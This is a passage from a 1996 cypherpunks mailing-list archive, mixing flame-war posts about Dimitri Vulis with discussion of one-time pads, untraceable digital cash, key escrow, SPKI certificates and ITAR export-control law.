Have fun with it!  If enough people do this, we just might be able to get 
him to leave us alone for a while.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.scytale.com (Roy M. Silvernail)
Date: Thu, 17 Oct 1996 06:02:55 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Q.E.D.
In-Reply-To: <Pine.BSI.3.95.961016211701.25964A-100000@citrine.cyberstation.net>
Message-ID: <961017.072748.1t7.rnr.w165w@sendai.scytale.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

Interesting that IPG sent two copies of this to the list under different
nyms.  Must be a ploy to get around killfiles.

In list.cypherpunks, cypher@cyberstation.net writes:

>          In support of their position, some have pointed out that John
>          von Neumann, to paraphrase, stated that ARITHMETIC cannot
>          produce random numbers, a thesis which I agree with; but
>          where is that, in any way inconsistent with IPG's position on
>          EUREKA?  IPG has produced a system to generate software OTPs,
>          albeit it within limited but more than ample entropy, not
>          software random numbers.

I need quote no mre than this.  A PRNG can produce *only* pseudo-random
numbers, and nothing else.  No amount of handwaving will transform
pseudo-random numbers into anything else.  The IPG system produces a
seeded pseudo-random keystream, which is assuredly not a true one time
pad.

Another *PLONK*.
- -- 
           Roy M. Silvernail     [ ]      roy@scytale.com
DNRC Minister Plenipotentiary of All Things Confusing, Software Division
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@scytale.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMmYnGhvikii9febJAQHTfQP/Q0yqGE/35hGjFJLc49r4/nD+tZnRFbY2
IY8/lwuF6SGzp9wBv65bQxNzn6i6g1OLc4knkAKUs+LCtWEZFh9VMj2PyHZH4g/5
150W/6inrjX19oAvCeMNZge3GVx+hGECqLarKb4VZ9or62GZTGmLFrZ4q+CgelsH
M30SIVF1fiE=
=bq67
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 17 Oct 1996 05:30:47 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: [Noise] Re: [POINTERS] On Vulis' net background
In-Reply-To: <Pine.BSF.3.91.961015230801.27633B-100000@mcfeely.bsfs.org>
Message-ID: <uXZXVD22w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Rabid Wombat <wombat@mcfeely.bsfs.org> writes:
> I don't know if anyone ever figured out who was forging votes for whom -
> the May '96 KOTM award was hotly contested, with forgeries flying every
> which way. If you have way too much time on your hands, read all about it
> at: http://www.wetware.com/mlegare/kotm/winnersk96.html#may96

Supposedly I won by a 30-vote margin over David C Lawrence (the moderator
of news.announce.newgroups), which I'm very proud of. Do take a look at
this site and at Misha Verbitsky's archives (taking everything with a
grain of salt). It makes good reading.

BTW, are _you related to http://206.250.116.19/~netscum/conwayc0.html?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Tunnicliffe" <Tunny@inference.com>
Date: Thu, 17 Oct 1996 08:27:37 -0700 (PDT)
To: "'Jonathan Litt'" <littlitt@MIT.EDU>
Subject: RE: USPS electronic postmark
Message-ID: <c=US%a=_%p=Inference%l=LANDRU-961017151804Z-1783@landru.novato.inference2.com>
MIME-Version: 1.0
Content-Type: text/plain


>Jonathan Litt[SMTP:littlitt@MIT.EDU] wrote:
>Today I was at the Internet Expo in Boston and I sent myself a
>postmarked email from the USPS booth. It is enclosed below for all to
>scrutinize.
>[...snip...]
>I will also paraphrase something that was said by one of the people at
>the booth:
>
>  "We always send the message itself as an attachment. The message that
>  you see at first shows the postmark, and warns you not to open the
>  attachment if you are not the intended recipient. Just as with normal
>  mail, it is a federal crime to double click on the attachment to view
>  the contents of the message if the message is not for you."
>[...snip...]
>As stated above, here is the message in its entirety, exactly as it
>arrived in my mailbox. Below that is the base64 decoded for your
>convenience.

(Official USPS warning:)
>[...]If you are not the intended
>recipient, you are hereby notified that any viewing, dissemination,
>distribution, or copying of this message is prohibited.
>
>Only littlitt@mit.edu may view the enclosed message.
[...unauthorized federally-protected not-for-your-eyes message
deleted...]

>Aaaugghh!  I accidentally viewed the message!  Now I'm a federal criminal! (A
>veritable Public Enemy, I guess, given my additional crime of wearing my RSA
>"munitions" shirt in full view of people who may well be dangerous foreign
>nationals.)
>
>If I go down for this, I'm taking you with me, Jonathan.
>
>Tunny
>======================================================================
> James A. Tunnicliffe   | WWWeb: http://www.inference.com/~tunny
> Inference Corporation  | PGP Fingerprint:   CA 23 E2 F3 AC 2D 0C 77
> tunny@Inference.com    |                    36 07 D9 33 3D 32 53 9C
>======================================================================
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 17 Oct 1996 05:30:51 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: [NOISE] I never knew that Dimitri Vulis was a net.legend
In-Reply-To: <Pine.SCO.3.93.961016133809.11688G-100000@grctechs.va.grci.com>
Message-ID: <o7ZXVD24w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Mark O. Aldrich" <maldrich@grci.com> writes:

> While the message blew by a little while ago (and I didn't save it),
> someone had posted a URL with information about Dimitri's sordid/alleged
> past on the Net.

And the present!

>                   At roughly the same time, I ran across (by accident) a

I suspect (haven't tried it) that if you go to http://www.altavista.com and
search the Web for "vulis", you'll get a lot of hits...

> URL that lists Dimitri as a "net.legend" and offers yet another
> perspective.  Apparently, Dimitri is far more well known that any of us
> (at least me) gave him credit for.

It is a great honor to meet a net.legent in person.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Thu, 17 Oct 1996 08:54:58 -0700 (PDT)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: YES OR NO?
In-Reply-To: <o7ZXVD24w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.961017083800.26656A-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Thu, 17 Oct 1996, Dr.Dimitri Vulis KOTM wrote:

> It is a great honor to meet a net.legent in person.

I hope Dimitri will stop hidding behind his computer and "honor" 
us with his presence at an SF Bay area Cypherpunks meeting.  I've 
got pledges for nearly $1200 to bring him out here to speak.  All
we need now is a serious response from Dimitri.  I guess when the
going gets tough, the "net legends" get yellow.  What are you 
afraid of Dimitri?


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Thu, 17 Oct 1996 06:02:56 -0700 (PDT)
To: "Timothy C. May" <tcmay@got.net>
Subject: RE: [NOISE] I never knew that Dimitri Vulis was a net.legend
Message-ID: <9609178455.AA845568064@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain



"Timothy C. May" <tcmay@got.net> wrote:
>And here I thought it was the real history of the Net, especially the part
>about how "the dandruff-covered Peter Vorobieff (spit) conspired with the
>purebred Sovok Valery Fabrikant (spit) to spread the lies of the Jew
>cripples dying of AIDS in Sovok-controlled clinics."

>(hint: this a satire, based on the writings of Vulis, who speaks of people
>as "lying purebred Sovok Tchurkas" (whatever _they_ are), and attaches
>the charming word "(spit)" after nearly every person he references.)

Just last week Concordia University in Montreal unveiled four new art
installations; one dedicated to the memory of each of the four professors shot
and killed by Valery Fabrikant. The works are in the form of tables so that they
can be integrated with the student body.

Raving on the net does occasionally have physical manifestations.

Prend soin,
James





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Thu, 17 Oct 1996 09:15:34 -0700 (PDT)
To: cypherpunks@toad.com
Subject: "Stopping Crime" Necessarily Means Invasiveness
Message-ID: <v03007800ae8c159eaa82@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



There are several swirling threads about the development of crypto systems
(e.g., "binding cryptography," "key recovery," "one-way traceable e-cash")
that are designed to allow law enforcement some ability to track illegal
transactions, catch some criminals, etc.

Lucky Green and I had a brief discussion of this at my party last Saturday.
Specifically, about the reasons some folks are avoiding "true" digital
cash, as described in Chaum's papers of the mid-80s, in favor of "crippled"
digital cash. We both agree that _any_ system which allows government to
act to trace a transaction, or to trace a message, or to gain access to
keys, essentially throws away the liberty-enhancing advantages of
cryptography completely.

That this is so, logically, is almost completely self-evident. If this is
not, ask yourself whether the government of Myanmar, known as SLORC, would
not use its "Government Access to Keys" to round up the dissidents in the
jungle. Would Hitler and Himmler have used "key recovery" to determine who
the Jews were communicating with so they could all be rounded up and
killed? Would the East German Staasi have traced e-cash transations? For
every government extant on the planet, even apparently benign government
such as that in the Vatican (*), one can easily think of dozens of examples
where access to keys, access to diaries, access to spending records, etc.,
would be exploited. (* And speaking of the Vatican, there's that little
matter of Michael Sindona, Banco Ambrosiano, links to CIA funds in BCCI,
and the body found swinging from the bottom of Black Friar's Bridge in
London. They're  just another power player, with a lot of interest in
financial matters. Some say the whole "confession" system worked for a
millenium as a surveillance and espionage system without peer.)

Any proposal to force traceability of transactions must deal with this
reality. What the government considers "criminal" or "suspicious" is often
what they consider threatening to their exercise of power, or even of their
particular time in power (e.g., the Democrats and their 900 FBI files
circulating throughout the White House, looking for dirt on their
"enemies," the Republicans. Do you really want Craig Livingstone having
GAK?).

The recent talk about "catching criminals" misses this point, that
governments typically use surveillance powers to control citizens. (Note: I
would think Dutch residents should be especially sensitive to this concern,
given what happened to them in WW II, when the arriving Nazis used
telephone records to locate Jews for extermination. Until recently, Holland
had a tendency to carefully think about such issues---I believe phone calls
were billed in such a way as to not keep such records, for example).

Yes, true digital cash--the fully untraceable form originally
discussed--will allow some new channels for criminal activity. Privacy has
its price. The ability of people to plot crimes and commit crimes behind
closed doors is obvious, and yet we don't demand secret cameras in homes,
apartments, and hotel rooms! A point we often make, but one we should
always remember.

And full untraceability--the necessary criterion for something to be really
called "cash"--also stops other kinds of crimes, particularly government
crimes.

As to fully untraceable digital cash--the real e-cash--we may be the
carriers of the torch for this. For whatever reasons, David Chaum is
backpedalling on his original points, and is making pro-traceability
noises. However, various persons on this list have pointed out that "coin
mixes" and other such methods can restore the full untraceability even of
Chaum's present system.

So, there is hope.

--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bert-Jaap Koops" <E.J.Koops@kub.nl>
Date: Thu, 17 Oct 1996 00:44:03 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Comments on binding cryptography (1)
Message-ID: <7F19D5B301E@frw3.kub.nl>
MIME-Version: 1.0
Content-Type: text/plain


Jim Miller <jim@suite.suite.com> wrote:
> Feeling any cognitive dissonance, Mr Koops?

Ever heard of fuzzy logic, Mr. Miller?

BJ




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Thu, 17 Oct 1996 09:46:26 -0700 (PDT)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: [Noise] Re: [POINTERS] On Vulis' net background
In-Reply-To: <uXZXVD22w165w@bwalk.dm.com>
Message-ID: <Pine.BSF.3.91.961017113357.1753A-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 17 Oct 1996, Dr.Dimitri Vulis KOTM wrote:

> Rabid Wombat <wombat@mcfeely.bsfs.org> writes:
> > I don't know if anyone ever figured out who was forging votes for whom -
> > the May '96 KOTM award was hotly contested, with forgeries flying every
> > which way. If you have way too much time on your hands, read all about it
> > at: http://www.wetware.com/mlegare/kotm/winnersk96.html#may96
> 
> Supposedly I won by a 30-vote margin over David C Lawrence (the moderator
> of news.announce.newgroups), which I'm very proud of. Do take a look at
> this site and at Misha Verbitsky's archives (taking everything with a
> grain of salt). It makes good reading.

Ah, but did you forge votes FOR yourself??

> 
> BTW, are _you related to http://206.250.116.19/~netscum/conwayc0.html?
> 

No, that's an entirely different diseased marsupial. No relation. Nice try, 
though.

Now knock off this silly shit. Legare's not going to give you a second 
term this easily.  :)

You have a very strange sense of accomplishment.

-r.w.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Thu, 17 Oct 1996 10:33:08 -0700 (PDT)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: [JIM RAY] Does anyone have the complaint number for Florida Barr Assocoation?
In-Reply-To: <6kBXVD12w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.961017114528.23042B-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


Vulis, grow up.

=============================================================================
 + ^ + |  Ray Arachelian    |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@brainlink.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/=
  /|\  | "A toast to Odin,  |KA| law abridging the freedom of speech'|==\|/==
 + v + |God of screwdrivers"|AK|        do you not understand?       |=======
===================http://www.brainlink.COM/~sunder/=========================
      If the Macintosh is a woman...  Then Windows is a Transvestite!
           ActiveX! ActiveX! Format Hard drive? Just say yes!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael Froomkin - U.Miami School of Law" <froomkin@law.miami.edu>
Date: Thu, 17 Oct 1996 08:53:49 -0700 (PDT)
To: Marshall Clow <mclow@owl.csusm.edu>
Subject: Re: Your editorial in the 10/14 PCWeek
In-Reply-To: <v03007806ae8b5d3d10dd@[207.67.246.99]>
Message-ID: <Pine.SUN.3.95.961017114912.26607H-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 16 Oct 1996, Marshall Clow wrote:
[...]
> In a paper about privacy and the original Clipper proposal (in 1994) 
...Jan '95 actually...
> A. Michael Froomkin of the University of Miami School of Law pointed out
> that since the entire key-escrow infastructure was created by
> presidential decree, and the proposed key holders were part of the
> executive branch, the provisions for release of the keys could be
> changed at a moment's notice by another presidential decree, which need
> not ever be made public. [ Yo, key escrow dude! Email your key database
> to wiretappers@fbi.gov, and don't tell anyone! ]

I still think this is a major issue; it is one, however, that goes away if
they pass a well-drafted statute.
 
> See <http://www-swiss.ai.mit.edu/6095/articles/froomkin-metaphor/partIC.html#ToC29> for the following quote, and <http://www-swiss.ai.mit.edu/6095/articles/froomkin-metaphor/text.html> 
> for the entire paper. 

You can get a frames version that spearates text and footnotes at
http://www.law.miami.edu/~froomkin/articles/clipper.htm

>(It's very long; but suprisingly readable, given that the author is a law
>professor ;-)

Thanks, I think.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law & Parent of David and Benjamin (9/13/96)
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.  And wet.  Very wet.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 17 Oct 1996 09:21:52 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Goodbye
Message-ID: <1.5.4.32.19961017162123.00673e44@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:04 PM 10/16/96 -0700, you wrote:


>Thus the glory days of cypherpunks, an insider club of the best
>and brightest, far superior to the common herd, where we planned and
>organized for a world where the ignorant masses can no longer
>rob and harass their superiors, a world where the elite can
>live the good life in freedom and comfort and abandon the
>useless worthless masses to wander blindly into ruin, despair,
>and slavery, lost in a world they cannot understand, and will
>no longer have the power to smash.


Why, James, this reads very much like Robert McNamara's best 
and brightest in the Nam glory days, cheerleading the B&B 
gang's gory battles slaughtering the worthless masses for 
vain comfort of the elite Pentagon planners.

I presume you are not a savagely scarred vet, wrecked by 
over-heated ambition of the B&B elite, just another rightly 
ignored McNamara crybaby aged-Whiz Kid.

Take R&R for a long while, you need it. Go to your nearest
VA Hospital and wipe-up bed pans. Then come back to c'punks
and earn your rank, not just flaunt the vanity plates.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Thu, 17 Oct 1996 12:34:07 -0700 (PDT)
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: YES OR NO?
Message-ID: <3.0b36.32.19961017121831.0114c6bc@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:45 AM 10/17/96 -0700, you wrote:

>On Thu, 17 Oct 1996, Dr.Dimitri Vulis KOTM wrote:
>
>> It is a great honor to meet a net.legent in person.
>
>I hope Dimitri will stop hidding behind his computer and "honor" 
>us with his presence at an SF Bay area Cypherpunks meeting.  I've 
>got pledges for nearly $1200 to bring him out here to speak.  All
>we need now is a serious response from Dimitri.  I guess when the
>going gets tough, the "net legends" get yellow.  What are you 
>afraid of Dimitri?

I can understand what he has to be afraid of.  It is one thing to be a
harassing bastard on the net.  It is another to have to defend your actions
to those people face to face.

Dimitri has made insulting remarks about myself and good friends.  He has
been abusive and obnoxious all over the face of the net.  I can see how
some people might take that personally.  (I would not do him personal harm.
 Ask him why he feels he needs to be a flaming asshole maybe...)

I killfiled Dimitri because there was no use talking to him and no use
listening to him.  Currently he has taken the tact of posting news when his
reputation capitol reaches into the heavy negative numbers.  (And I still
filter them all into the trash because I cannot trust him to not forge the
posts into something containing something the author did not write or
intend.)  There are others I do not argue with for other, similar, reasons.
 It is pointless to debate with the closed minded and the compulsive
flamers.  (If I wanted to listen to compulsive juvenile flame I would go
hang out on WWIV BBSes.  It least there you know the people are probably
fourteen, not just acting like it...)  The only purpose such debate will
ever serve is to influence the onlookers.

The point is probably moot anyways.  I doubt if I will get to any of the
California meetings any time in the near future.  (Work is hell, but at
least it pays something. Unlike the regular brand of hell.)

---
|  "Remember: You can't have BSDM without BSD." - alan@ctrl-alt-del.com  |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@ACM.ORG>
Date: Thu, 17 Oct 1996 10:06:07 -0700 (PDT)
To: Steve Schear <azur@netcom.com>
Subject: Anonymous Auth Certificates [was: Re: Blinded Identities]
In-Reply-To: <v02130503ae865897f409@[10.0.2.15]>
Message-ID: <v03007802ae8c171fb5bc@[168.143.8.144]>
MIME-Version: 1.0
Content-Type: text/plain


At 16:28 -0400 10/13/96, Michael Froomkin - U.Miami School of Law wrote:
>[cc'd to coderpunks]
>
>On Sun, 13 Oct 1996, Steve Schear wrote:
>
>> >Steve Shear <azur@netcom.com> writes:
>
>[much cut]
>>
>> I've been charged with developing an Internet service which needs to assure
>> its clients of anonymity.  However, we fear some clients may abuse the
>> service and we wish to prevent the abusers from re-enrollment if
>> terminated for misbehavior. (In your example, it would be the person(s)
>> trying to discover the service host via flood).
>>
>> My thought was to base enrollment on some sort of 'blinding' of their
>> certified signature (e.g., from Verisign) which produces a unique result
>> for each signature but prevents the service from reconstructing the
>> signature itself (and thereby reveal the client's identity).  I'm calling
>> this negative authentication.
>>
>> Have you come across anyone who has considered this problem or
>> another one which is mathematically very similar?

The mistake is to think of using ID certificates (like those from Verisign)
in the first place.  They don't mean anything.

You want an authorization certificate, such as produced by SPKI.  You need
to know what a key is authorized to do, not what name is associated with
the key.

Check out

http://www.clark.net/pub/cme/spki.txt
and
http://theory.lcs.mit.edu/~rivest/publications.html in the SDSI section.

 - Carl


+------------------------------------------------------------------------+
|Carl M. Ellison   cme@acm.org     http://www.clark.net/pub/cme          |
|PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2|
|  "Officer, officer, arrest that man!  He's whistling a dirty song."    |
+-------------------------------------------- Jean Ellison (aka Mother) -+






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@ACM.ORG>
Date: Thu, 17 Oct 1996 10:13:56 -0700 (PDT)
To: Steve Schear <azur@netcom.com>
Subject: Anonymous Auth Certificates [was: Re: Blinded Identities]
Message-ID: <v03007803ae8c19a44d29@[168.143.8.144]>
MIME-Version: 1.0
Content-Type: text/plain


P.S.

you might also check out http://www.clark.net/pub/cme/usenix.html
for more on why ID certificates are useless in any case.

 - Carl


+------------------------------------------------------------------------+
|Carl M. Ellison   cme@acm.org     http://www.clark.net/pub/cme          |
|PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2|
|  "Officer, officer, arrest that man!  He's whistling a dirty song."    |
+-------------------------------------------- Jean Ellison (aka Mother) -+






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Thu, 17 Oct 1996 10:19:26 -0700 (PDT)
To: coderpunks@toad.com (The Coderpunks list)
Subject: SKIP cryptanalysis?
Message-ID: <199610171825.NAA08114@homeport.org>
MIME-Version: 1.0
Content-Type: text


Has anyone looked into SKIP key management?

I'm aware of Jeff Schiller's statement about OAKLEY/ISAKMP being the
more flexible, useful system to be the main standard for IPsec.

Adam


-- 
"Every year the Republicans campaign like Libertarians, and then go to
Wasthington and spend like Democrats."

Vote Harry Browne for President.  http://www.harrybrowne96.org







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iang@cs.berkeley.edu (Ian Goldberg)
Date: Thu, 17 Oct 1996 13:27:55 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: exporting signatures only/CAPI (was Re: Why not PGP?)
In-Reply-To: <199610121908.OAA19871@homeport.org>
Message-ID: <5464re$n6d@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199610130802.JAA00335@server.test.net>,
Adam Back  <aba@dcs.ex.ac.uk> wrote:
>
>What exactly is microsoft certifying when they sign a CAPI module?
>
>That it is quality crypto?  Has no obvious bugs?  That it won't crash
>your system?

I remember hearing (if my memory is correct, from the mouth of a Microsoft
employee at Crypto '96) that when Microsoft signs a module, they are certifying
that they saw a signed sheet of paper swearing that either
(1) you won't export the software, or
(2) you have received an appropriate export license.

AFAIK, they don't even read the code.

   - Ian

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMmaWoEZRiTErSPb1AQEsrQP/V8fxGzqySpul2UKQLHDcNeY23UFVibvo
weLgaoEdTE40+A7iKfEUyQe6LUvDKKO+HPdxO2jfq9rdT+QUFpm0e0VI8j8kaUQS
6M05fRV/Q66YlmTspiz0jfyGOLauYAtlh8ow+fftAdfUGnb9vN4ODsT8z0Vd59xc
nsAFH9UihU8=
=QIJT
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Thu, 17 Oct 1996 13:35:36 -0700 (PDT)
To: cypherpunks@toad.com
Subject: NAVAHO
Message-ID: <v02130504ae8bddd2ae79@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


As most all on this list are aware, the U.S. Army made frequent and
successful use of our indigenous people (often Navaho) for battle field
communications during WW II.  Now obviously Navaho is a widely recognized
language and even our 'oppressive" government wouldn't dare tell such
speakers, who might be under investigation for some alledged criminal
activity, that were engaging in international communications that they
could not use this or a similar form of communciation because LE might not
be able to interpret its meaning.

What would be the legal status of communicating with a language, too
complex for easy human use, which required a computer to structure and
translate between other human languages?  What would be the ITAR
implication of exporting such linguistic software?

What about speaking or writing riddles or other 'indirect' coding in which
the true meaning of spoken or written communication is other than the
appearent (literature, especially mysteries have them)?  Could export of
software designed to create/interpret such riddles or 'hidden' meanings
come under ITAR regulation?

-- Steve



PGP Fingerprint: FE 90 1A 95 9D EA 8D 61  81 2E CC A9 A4 4A FB A9
---------------------------------------------------------------------
Snoop Daty Data           | Internet: azur@netcom.com
Grinder                   |
Sacred Cow Meat Co.       |
---------------------------------------------------------------------

Counter-cultural technology development our specialty.

Vote Libertarian.

Just say NO to prescription DRUGS.

"Of all tyrannies, a tyranny sincerely exercised for
 the good of its victims may be the most oppressive."
    -- C.S. Lewis

"Surveillence is ultimately just another form of media, and thus, potential
entertainment."
    -- G. Beato






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Thu, 17 Oct 1996 13:34:55 -0700 (PDT)
To: cypherpunks@toad.com
Subject: ITAR/real law, copyright
Message-ID: <3.0b28.32.19961017134407.00708a80@ricochet.net>
MIME-Version: 1.0
Content-Type: text/plain



Sorry for the rushed character of this note - am working on another project
which is eating up my available time. I just wanted to respond because I
think Tim and Marshall are talking about different ends of the same process.

At 03:37 PM 10/16/96 -0800, Tim May wrote:
>At 10:56 AM -0700 10/16/96, Marshall Clow wrote:
>>A) This is not a change in the law. There is no law regarding export of
>>encryption software.
>>Congress has never passed any such law. These are State Department
>>regulations, and presidential decrees. These regulations, which have the
>>force of law to you and me, were never debated or voted upon by our
>>elected representatives. They can be changed tomorrow the same way. In
>>fact, they can be changed and the public need not even be notified.
>
>Actually, as Greg Broiles pointed out in an article (on the Cypherpunks
>list) several weeks ago, Congress deliberately chooses to delegate much
>regulatory authority to other agencies.

As I understand the export-license process, there are multiple steps:

1. Commodity jurisdiction request: State Dept decides if ITAR controls the
export of the item (e.g., is it a "defense article" or a "defense service"
or "technical data", and not public domain, etc.)? 

2. If ITAR does control the export, the State Dept decides (based on the
characteristics of the item and the identity/location of the foreign
recipient and the opinion(s) of other agencies consulted) whether or not to
allow the export. 

The fact that these steps must be taken (and the general procedure for
doing so) is a product of the Arms Export Control Act (passed by Congress,
at 22 USC 2778 and thereabouts) and the ITARs (22 CFR 120 et seq),
administrative regulations promulgated by the Dept of State. (To change the
ITARs themselves, State Dept must publish notice of the proposed changes
and solicit public comments, as well as make the final regs public in the
CFRs and via the Federal Register). So the ITARs are "real laws", at least
as real as any others.

But the process by which these steps (deciding what will be a "munition",
deciding whether or not a particular item is within one of those defined as
munitions, deciding whether or not to allow an export) are taken involves
policy choices whose motives and processes are not entirely clear, and
which can be (and are) changed by the executive branch without notice or
opportunity to comment. What I'm thinking of here are the rules like
"40-bit RC4 is OK" and "3DES is never OK" and "56-bit DES with GAK is OK"
and "disk bad, OCR text OK" which we're discovering through trial & error
but are not, to my knowledge, part of the ITARs or elsewhere in the CFR or
the USC. Also, Dept of State's decisions about individual exports and items
are not subject to judicial review, by 22 USC 2778(h), an interpretation
which is being challenged in the appeal in _Karn_. Interested readers might
take a look at the district court's opinion in _Karn_ at
<http://venable.com/oracle/oracle7.htm> and Stewart Baker's analysis of it
at  <http://www.us.net/~steptoe/summary.htm>.

I think my understanding of the ITAR process is mediocre at best, I
certainly welcome correction or clarification, although Jim Bell's
predictable and wholly incorrect assertion that administrative regs only
apply to government employees would be funny but for the fact that I know
ordinary people (not government employees) who have been convicted of
violating federal admin regs and the fines they paid (or are still paying),
jail time spent, etc were all too real. My summary of admin law is
deliberately vague because frankly admin law isn't my strong suit. Perhaps
another list member with a superior understanding will fill in the gaps in
my summaries. 

Also, Sean Sutherland wrote to ask (re the SPA's position on copyright
liability):

>I'm curious, do the Contributory Infringment 
>and the Vicarious Liability for Infringment By Another Person claims have
any 
>legal basis, or are they just the inane rantings they appear to be?

I sent a long message to the list a few days ago (Sunday?) discussing
contributory infringement. The short version of the message is "Yes,
contributory infringement is valid, but not necessarily in this particular
case". And ditto for vicarious liability, although I think vicarious
liability isn't even plausibly arguable. They are neither novel nor
especially remarkable facets of copyright law, although as Sean notes they
do not have explicit textual support in the Copyright act. Vicarious
liability is an extension of the legal doctrine of "respondeat superior",
e.g., an employer/principal is liable for the actions of an employee/agent
for actions taken within the scope of employment/agency. Contributory
infringement is an extension of the principles of enterprise liability,
where (very generally) people who undertake a common purpose/project will
share liability, even where only one party directly caused the actual harm.
_Sony v. Universal City Studios_ 464 US 417, 435 (1984). Nimmer on
Copyright 12.04[A] notes that it's possible to read 17 USC 106's grant of
the exclusive right to "authorize" the exercise of the other exclusive
rights as excluding the authorization of infringement by third parties
(making the illicit authorizer a direct infringer). But that reading seems
awfully technical, and Nimmer cites no cases which rely on it (and later
describes it as "overly facile").

In any event, yes, vicarious liability and contributory infringement are
